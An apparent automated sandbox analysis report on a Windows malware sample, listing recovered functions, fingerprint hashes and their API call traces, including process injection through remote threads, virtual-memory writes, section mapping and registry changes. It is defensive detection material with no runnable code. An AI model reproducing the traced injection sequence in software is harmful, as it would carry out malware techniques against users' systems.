  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B314CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
